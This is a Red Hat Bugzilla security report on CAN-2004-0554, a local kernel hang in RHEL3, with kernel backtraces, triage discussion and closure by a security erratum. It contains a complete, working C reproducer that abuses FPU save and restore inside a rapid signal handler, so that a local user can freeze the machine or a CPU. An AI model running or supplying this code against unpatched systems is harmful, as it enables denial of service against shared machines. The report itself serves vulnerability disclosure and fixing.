Bug 125794
| Summary: | CAN-2004-0554 local user can get the kernel to hang | ||
|---|---|---|---|
| Product: | Red Hat Enterprise Linux 3 | Reporter: | Petter Reinholdtsen <pere> |
| Component: | kernel | Assignee: | Ernie Petrides <petrides> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | ||
| Version: | 3.0 | CC: | bark, bnocera, greg, holger, jrfuller, k.georgiou, mjc, petrides, riel, shadow, tao, tburke, trondham, woodard |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | ||
| Hardware: | i386 | ||
| OS: | Linux | ||
| URL: | http://marc.theaimsgroup.com/?l=linux-kernel&m=108681568931323&w=2 | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | Bug Fix | |
| Doc Text: | Story Points: | --- | |
| Clone Of: | Environment: | ||
| Last Closed: | 2004-06-18 00:59:36 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
| Bug Depends On: | |||
| Bug Blocks: | 116727 | ||
|
Description
Petter Reinholdtsen
2004-06-11 14:44:16 UTC
Hello, Petter. Could you please post a test case in this bugzilla report (as well as any possible panic or oops output from the console)? As it stands, there's not enough information in this report to debug a potential problem. Thanks. -ernie Sure. Are you on a closed network or something? The second
URL contain the source. Here is it:
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>
static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
OK, I reproduced the hang on my test system, got a backtrace too... ;) Pid: 19752, comm: kernel-hang-bz1 EIP: 0060:[<ffff345c>] CPU: 0 EIP is at 0xffff345c EFLAGS: 00000202 Not tainted (2.6.5-1.332) EAX: 00000001 EBX: 12005870 ECX: fef32ea8 EDX: 1958f000 ESI: 1958f000 EDI: fef32ea8 EBP: fef32e48 DS: 007b ES: 007b CR0: 80050033 CR2: 00c4b720 CR3: 003ab000 CR4: 000006d0 Call Trace: [<0210dcda>] restore_i387_fxsave+0x18/0x60 [<0210dd38>] restore_i387+0x16/0x65 [<021059e5>] restore_sigcontext+0xf2/0x10c [<0215b737>] get_user_size+0x30/0x57 [<02105c13>] sys_sigreturn+0x214/0x23a Hmmm, this backtrace is with a 2.6 kernel btw.... Tried it before rebooting my test box into a RHEL3 kernel ;)) Here is the backtrace (alt-sysrq-p) for the very latest RHEL3 kernel. Definitely looks like Pid/TGid: 3815/3815, comm: kernel-hang-bz1 EIP: 0060:[<c03ec1cc>] CPU: 0 EIP is at coprocessor_error [kernel] 0x0 (2.4.21-15.5.ELsmp) ESP: 0060:c0113d14 EFLAGS: 00000206 Not tainted EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000 ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033 CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0 Call Trace: [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4) [<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04) [<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18) [<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94) And a second alt-sysrq-p trace, of the same hang. Guess it's looping in the fpu restore and exception handling code somewhere? Pid/TGid: 3815/3815, comm: kernel-hang-bz1 EIP: 0060:[<c01137b7>] CPU: 0 EIP is at save_init_fpu [kernel] 0x17 (2.4.21-15.5.ELsmp) ESP: 8000:c010cd47 EFLAGS: 00000206 Not tainted EAX: bfebfbff EBX: d9818000 ECX: 00000068 EDX: d9818000 ESI: d9818000 EDI: c010ce50 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033 CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0 Call Trace: [<c010cd47>] math_error [kernel] 0x17 (0xd9819e18) [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819e34) [<c012f015>] bh_action [kernel] 0x55 (0xd9819e48) [<c012eeb7>] tasklet_hi_action [kernel] 0x67 (0xd9819e50) [<c010db38>] do_IRQ [kernel] 0x148 (0xd9819e84) [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4) [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4) [<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04) [<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18) [<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94) ... and a bunch more, in different functions ... Pid/TGid: 3815/3815, comm: kernel-hang-bz1 EIP: 0060:[<c03ec1e4>] CPU: 0 EIP is at device_not_available [kernel] 0x0 (2.4.21-15.5.ELsmp) ESP: 0060:c0113d14 EFLAGS: 00000206 Not tainted EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000 ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033 CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0 Call Trace: [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4) [<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04) [<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18) [<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94) SysRq : Show Regs Pid/TGid: 3815/3815, comm: kernel-hang-bz1 EIP: 0060:[<c010d005>] CPU: 0 EIP is at math_state_restore [kernel] 0x5 (2.4.21-15.5.ELsmp) ESP: c20f:c0113d14 EFLAGS: 00000286 Not tainted EAX: 8005003b EBX: d9818000 ECX: bfffc888 EDX: 00000068 ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033 CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0 Call Trace: [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4) [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4) [<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04) [<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18) [<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94) SysRq : Show Regs Pid/TGid: 3815/3815, comm: kernel-hang-bz1 EIP: 0060:[<c010d005>] CPU: 0 EIP is at math_state_restore [kernel] 0x5 (2.4.21-15.5.ELsmp) ESP: c20f:c0113d14 EFLAGS: 00000286 Not tainted EAX: 8005003b EBX: d9818000 ECX: bfffc888 EDX: 00000068 ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033 CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0 Call Trace: [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4) [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4) [<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04) [<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18) [<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94) SysRq : Show Regs Pid/TGid: 3815/3815, comm: kernel-hang-bz1 EIP: 0060:[<c03ec1cc>] CPU: 0 EIP is at coprocessor_error [kernel] 0x0 (2.4.21-15.5.ELsmp) ESP: 0060:c0113d14 EFLAGS: 00000206 Not tainted EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000 ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033 CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0 Call Trace: [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4) [<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04) [<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18) [<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94) SysRq : Show Regs Pid/TGid: 3815/3815, comm: kernel-hang-bz1 EIP: 0060:[<c03ec1e6>] CPU: 0 EIP is at device_not_available [kernel] 0x2 (2.4.21-15.5.ELsmp) ESP: 3d14:ffffffff EFLAGS: 00000206 Not tainted EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000 ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033 CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0 Call Trace: [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4) [<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04) [<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18) [<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94) SysRq : Show Regs Pid/TGid: 3815/3815, comm: kernel-hang-bz1 EIP: 0060:[<c01355ab>] CPU: 0 EIP is at force_sig_info [kernel] 0x8b (2.4.21-15.5.ELsmp) ESP: 9e28:00000008 EFLAGS: 00000282 Not tainted EAX: 00000000 EBX: d9818000 ECX: d992d380 EDX: d992d300 ESI: ffffffff EDI: 00000008 EBP: ffffffff DS: 0068 ES: 0068 FS: 0000 GS: 0033 CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0 Call Trace: [<c010ce50>] do_coprocessor_error [kernel] 0x0 (0xd9819e10) [<c010cde8>] math_error [kernel] 0xb8 (0xd9819e18) [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819e34) [<c01343a2>] timer_bh [kernel] 0x62 (0xd9819e40) [<c0133dcb>] update_process_times_statistical [kernel] 0x7b (0xd9819e48) [<c012f015>] bh_action [kernel] 0x55 (0xd9819e54) [<c012eeb7>] tasklet_hi_action [kernel] 0x67 (0xd9819e5c) [<c010db38>] do_IRQ [kernel] 0x148 (0xd9819e90) [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4) [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4) [<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04) [<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18) [<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94) OK, it looks like this bug is being tracked down on the linux-kernel mailing list. We'll make sure all the kernels shipped by Red Hat will get the fix once we all agree on what the right fix is upstream. This code is definitely too subtle for a "quick fix"... ;) FYI, I got this from a customer: "btw - we're noticing that it doesn't totally kill an SMP machine, but rather throws one of the CPUs into a 100% system-time loop, with a process that you can't kill That tidbit might be of use to the kernel engineering guys" Thanks, J Do you have any estimate on when we can expect a new kernel fixing this? We need to schedule upgrade and reboot of 850 redhat machines, and it would be nice if we could start planning already. FYI, this bug also affects x86_64 (Opteron) when running a 32bit version of the exploit code. Native 64bit mode is not affected, but the default kernel enables 32bit emulation mode. 32bit mode on ia64 (Itanium) may also be affected (untested). A fix is in hand (posted in comment #5 of bug 125900). Thanks for the reproducer (in comment #2) and all the extra information. I'll post more information when the fix is committed to RHEL3 U3 and also about what our plans our for issuing an RHSA erratum. *** Bug 125968 has been marked as a duplicate of this bug. *** Allocated CAN-2004-0554 A fix for this problem has just been committed to the RHEL3 U3 patch pool this evening (in kernel version 2.4.21-15.11.EL). I will update this bug report again as soon as a (pre-U3) security advisory is available. Petter, in response to your comment #12, there is a Red Hat Security Advisory in the works (RHSA-2004:255) for this bug and two other problems. Best case is that it will become available late tonight (Thursday) on RHN, but it's more likely to first be available tomorrow (Friday). When the Errata is pushed, this bug report will automatically be updated and closed. An errata has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHSA-2004-255.html |